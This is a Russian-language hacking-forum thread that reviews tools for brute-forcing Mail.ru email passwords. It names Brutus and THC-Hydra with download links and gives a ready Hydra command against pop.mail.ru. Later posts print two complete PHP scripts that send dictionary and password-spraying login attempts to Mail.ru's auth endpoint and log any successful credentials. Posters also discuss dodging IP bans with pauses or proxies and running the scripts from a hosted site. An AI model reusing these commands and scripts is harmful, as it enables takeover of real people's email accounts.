Чем брутить Mail.ru Тестировать будем сервер pop.mail.ru Заранее создадим пользователя и будем пытаться достать на него пароль... Создали пользователя [email protected]:alphabet Будем атаковать по словарю, т.к. полным перебором смысла нет в данном случае... Время скорости полного перебора зависит от сложности пароля... Создал словарь 819 слов, где 818 - наш 1. Brutus-AET2 Самый известный и многофункциональный брутфорс. Небольшое описание: Brutus - удаленный опознавательный агент (проще взломщик паролей). Brutus используется для восстановления правильных маркеров доступа (обычно имя пользователя и пароль) для данной системы. Примерами поддерживаемой системы могут быть FTP сервер, пароль защищенная web-страница, консоль маршрутизатора, POP3 сервер и т.д. Предупреждение! Некоторые антивирусы реагируют на эту программу как "злонамеренная программа". Платформа: Windows Тут: http://www.securitylab.ru/software/232832.php Скачать: http://securitylab.ru/_tools/brutus-aet2.zip --- Как им пользоваться, смотрим видео: http://video.antichat.ru/file109.html --- Итак брутим наше мыло: Brutus Потратил 24 секунды на взлом нашего мыла... 2. THC-Hydra Отличный брутфорс под nix. THC-Hydra - распараллеленый взломщик паролей к различным сервисам (FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO и др.) для UNIX платформ. С помощью этой утилиты вы можете атаковать несколько сервисов одновременно. http://www.securitylab.ru/software/233034.php http://freeworld.thc.org/thc-hydra/ --- Как пользоваться смотрим видео: http://video.antichat.ru/file110.html --- Hydra потратила 17 секунд на взлом нашего мыла... --- 3. PHP Mail.Ru BruteForce by NOmeR1 Обсуждение: https://forum.antichat.ru/thread49574.html Решил его сюда включить, т.к. скипт очень интересный и получил хорошие отзывы... Он не использует сокеты, он как бы пытаеться залогиниться через страницу mail.ru =) --- Пользоваться очень легко, достаточно ввести нужное мыло, ваше мыло, и файл - словарь... --- Скрипт потратил меньше 20 секунд на взлом нашего мыла... --- Пожалуйста постим сюда только брутер и инфу... За каждую дельную инфу ставлю +5 =)
А как же genom mail-ru bruter ? Очень хороший скрипт, и работает пошустрее брутера на пхп. Ок,здесь: http://forum.antichat.ru/threadnav31521-1-10.html http://forum.antichat.ru/showpost.php?p=264393&postcount=13 http://forum.antichat.ru/thread38778.html скачать можно здесь
Пока потестил тока эти... Это не "Обзор всех брутеров"... По мере возможности буду выкладывать, что потестил...
>> Да бесмысленно это всё уже, если нет потдержки прокси, маил уже банит за брут по айпи кто-нибудь, знает после скольки попыток там банят по айпи ? ) если по http брутить?
Я как понялтам повремени банят, попытки не считал, т.к. каждый раз было по разному, и скорость перебора была разная, мой вывод был только по времени бесприрывного перебора, так что есть вариант делать паузы а естьв ариант прокси юзать, но брута под маил хттп с прокси я не видел.
гидру юзай... hydra -l login -P dictionary.dic -e ns -o log.txt -v pop.mail.ru pop3 она и побыстрее и в ней все мегапросто )
гыг вот я тоже решил небольшой брутер майла на пхп написать для брута одного логина несколькими паролями PHP: <?php $login="testbrute"; $passfile = "pass.txt"; for ($doscriot=0;$doscriot<=count($contents);$doscriot++) { $passfile = "pass.txt"; $handle = fopen($passfile,"r"); $contents = fread($handle,filesize($passfile)); fclose($handle); $contents = explode("\n",$contents); $parol=trim($contents[$doscriot]); $hostname = "win.mail.ru"; $path = "/cgi-bin/auth"; $line = ""; $fp = fsockopen($hostname, 80, $errno, $errstr, 30); if (!$fp) echo "$errstr ($errno)<br />\n"; else { $data = "Login=".$login."&Domain=mail.ru&Password=".$parol."&Mpopl=693039118\r\n\r\n"; $headers = "POST $path HTTP/1.1\r\n"; $headers .= "Host: $hostname\r\n"; $headers .= "Content-type: application/x-www-form-urlencoded\r\n"; $headers .= "Content-Length: ".strlen($data)."\r\n\r\n"; fwrite($fp, $headers.$data); while (!feof($fp)) { $line .= fgets($fp, 1024); } fclose($fp); } if($line[9]=="3") { $zergood = 'good.txt'; $somecontent = " для логина ".$login." пароль ".$parol; if (is_writable($zergood)) { if (!$udacha = fopen($zergood, 'a')) { echo "Не могу открыть файл ($zergood)"; exit; } if (fwrite($udacha, $somecontent) === FALSE) { echo "Не могу произвести запись в файл ($zergood)"; exit; } echo "Ура! сбручено ($somecontent) и записано в файл ($zergood)"; fclose($udacha); } else { echo "Файл $zergood недоступен для записи"; } } } ?> для брута одного пароля на несколько логинов PHP: <?php $parol="123456"; $loginsfile = "login.txt"; for ($doscriot=0;$doscriot<=count($contents);$doscriot++) { $loginsfile = "login.txt"; $handle = fopen($loginsfile,"r"); $contents = fread($handle,filesize($loginsfile)); fclose($handle); $contents = explode("\n",$contents); $loginsss=trim($contents[$doscriot]); $hostname = "win.mail.ru"; $path = "/cgi-bin/auth"; $line = ""; $fp = fsockopen($hostname, 80, $errno, $errstr, 30); if (!$fp) echo "$errstr ($errno)<br />\n"; else { $data = "Login=".$loginsss."&Domain=mail.ru&Password=".$parol."&Mpopl=693039118\r\n\r\n"; $headers = "POST $path HTTP/1.1\r\n"; $headers .= "Host: $hostname\r\n"; $headers .= "Content-type: application/x-www-form-urlencoded\r\n"; $headers .= "Content-Length: ".strlen($data)."\r\n\r\n"; fwrite($fp, $headers.$data); while (!feof($fp)) { $line .= fgets($fp, 1024); } fclose($fp); } if($line[9]=="3") { $zergood = 'good.txt'; $somecontent = " у пароля ".$parol." логин ".$loginsss; if (is_writable($zergood)) { if (!$udacha = fopen($zergood, 'a')) { echo "Не могу открыть файл ($zergood)"; exit; } if (fwrite($udacha, $somecontent) === FALSE) { echo "Не могу произвести запись в файл ($zergood)"; exit; } echo "Ура! сбручено ($somecontent) и записано в файл ($zergood)"; fclose($udacha); } else { echo "Файл $zergood недоступен для записи"; } } } ?> результат запишется в файл good.txt по окончанию лично моё мнение брутить со своей машины это жесть для траффика вот небольшой подарок у кого не анлимит запустил скрипт выключил комп лёг спать и за тебя твой сайт всё сделает и никакого расхода трафика)
